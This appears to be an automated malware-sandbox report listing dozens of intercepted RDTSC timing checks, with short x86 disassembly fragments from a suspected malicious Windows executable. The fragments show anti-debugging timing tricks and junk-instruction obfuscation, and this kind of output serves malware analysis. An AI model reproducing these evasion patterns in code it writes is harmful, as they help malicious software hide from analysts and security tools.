              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F6434 second address: 5F64AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FEBD887DA76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2032h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FEBD887DA78h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov di, BDE4h 0x00000035 jmp 00007FEBD887DA7Eh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FEBD887DA78h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 mov dword ptr [ebp+122DB2CCh], edx 0x0000005c xchg eax, esi 0x0000005d push esi 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F64AB second address: 5F64CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEBD8FBE244h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F64CB second address: 5F64EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEBD887DA7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F569A second address: 5F56C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FEBD8FBE244h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FEBD8FBE236h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65D3 second address: 5F65D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65D9 second address: 5F65E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65E8 second address: 5F65F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD887DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65F2 second address: 5F6692 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEBD8FBE23Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add dword ptr [ebp+122D1FDFh], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FEBD8FBE238h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 sub dword ptr [ebp+124650F9h], edx 0x00000038 mov bx, dx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov ebx, esi 0x00000044 mov eax, dword ptr [ebp+122D1649h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007FEBD8FBE238h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 jno 00007FEBD8FBE23Bh 0x0000006a push FFFFFFFFh 0x0000006c push edx 0x0000006d mov ebx, esi 0x0000006f pop ebx 0x00000070 nop 0x00000071 jmp 00007FEBD8FBE241h 0x00000076 push eax 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F75F0 second address: 5F75F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F93A9 second address: 5F93B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F87B6 second address: 5F87C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FB366 second address: 5FB36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FB36C second address: 5FB37B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FB37B second address: 5FB3E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE246h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1E48h], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FEBD8FBE238h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FEBD8FBE238h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 movsx ebx, cx 0x0000004b xchg eax, esi 0x0000004c push edx 0x0000004d push ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FA547 second address: 5FA54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FA54B second address: 5FA565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE246h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FA565 second address: 5FA575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FA575 second address: 5FA579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FA579 second address: 5FA587 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEBD887DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FA587 second address: 5FA58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FE39E second address: 5FE3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e jo 00007FEBD887DA76h 0x00000014 push eax 0x00000015 pushad 0x00000016 jno 00007FEBD887DA85h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEBD887DA81h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FC4C3 second address: 5FC4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FF450 second address: 5FF4D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FEBD887DA84h 0x00000011 jmp 00007FEBD887DA7Fh 0x00000016 push 00000000h 0x00000018 mov di, 17A1h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FEBD887DA78h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov ebx, ecx 0x0000003a xchg eax, esi 0x0000003b jmp 00007FEBD887DA82h 0x00000040 push eax 0x00000041 pushad 0x00000042 jbe 00007FEBD887DA78h 0x00000048 push eax 0x00000049 pop eax 0x0000004a pushad 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FC4C7 second address: 5FC4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEBD8FBE245h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FB547 second address: 5FB5CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FEBD887DA78h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 or dword ptr [ebp+124503EAh], edx 0x00000028 clc 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007FEBD887DA89h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov ebx, ecx 0x0000003e mov eax, dword ptr [ebp+122D0425h] 0x00000044 push FFFFFFFFh 0x00000046 je 00007FEBD887DA79h 0x0000004c mov di, bx 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FEBD887DA84h 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FC4E6 second address: 5FC4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FD3B9 second address: 5FD3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 600414 second address: 600468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEBD8FBE246h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jc 00007FEBD8FBE236h 0x00000019 jmp 00007FEBD8FBE249h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 601613 second address: 60161B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 609B9F second address: 609BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 609BBA second address: 609BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 609E79 second address: 609E99 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD8FBE236h 0x00000008 jmp 00007FEBD8FBE23Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007FEBD8FBE236h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 609FE2 second address: 609FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 609FE8 second address: 60A008 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FEBD8FBE23Eh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60A008 second address: 60A012 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEBD887DA7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60F163 second address: 60F16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60F16D second address: 60F195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 jmp 00007FEBD887DA85h 0x0000000d pop esi 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60F195 second address: 60F1C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE23Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ebx 0x00000010 jc 00007FEBD8FBE238h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60F1C0 second address: 60F1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60F2DB second address: 60F2F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 60F2F7 second address: 60F2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6141BD second address: 6141C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6141C5 second address: 6141D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FEBD887DA7Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6137BB second address: 6137C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6137C1 second address: 6137CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6137CA second address: 6137DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FEBD8FBE242h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6137DA second address: 6137E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6137E0 second address: 6137E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 61397A second address: 613985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEBD887DA76h 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 613AB7 second address: 613ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6190EB second address: 619100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FEBD887DA7Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 619100 second address: 61910F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FEBD8FBE236h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A7511 second address: 5A7515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A7515 second address: 5A751E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A751E second address: 5A7535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA82h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E47E3 second address: 5E47FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEBD8FBE23Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E47FD second address: 5E4803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4803 second address: 5E4848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FEBD8FBE238h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sbb edi, 77186947h 0x00000029 mov di, 6F5Ah 0x0000002d lea eax, dword ptr [ebp+1248056Eh] 0x00000033 mov ch, D7h 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jg 00007FEBD8FBE23Ch 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4848 second address: 5E484C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4E93 second address: 5E4EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEBD8FBE246h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FEBD8FBE242h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edx 0x0000001b jbe 00007FEBD8FBE23Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4EDA second address: 5E4F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edi 0x00000011 pop eax 0x00000012 jc 00007FEBD887DA84h 0x00000018 jmp 00007FEBD887DA7Eh 0x0000001d call 00007FEBD887DA79h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FEBD887DA87h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4F22 second address: 5E4F27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4F27 second address: 5E4F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FEBD887DA78h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4F39 second address: 5E4F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4F4F second address: 5E4F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E4F5D second address: 5E4F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEBD8FBE236h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5048 second address: 5E5052 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEBD887DA7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E52AA second address: 5E52B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E536A second address: 5E53A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEBD887DA83h 0x0000000f nop 0x00000010 or edx, 396221CEh 0x00000016 push 00000004h 0x00000018 mov dword ptr [ebp+122D33FFh], ebx 0x0000001e nop 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E53A0 second address: 5E53C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD8FBE236h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FEBD8FBE23Ch 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
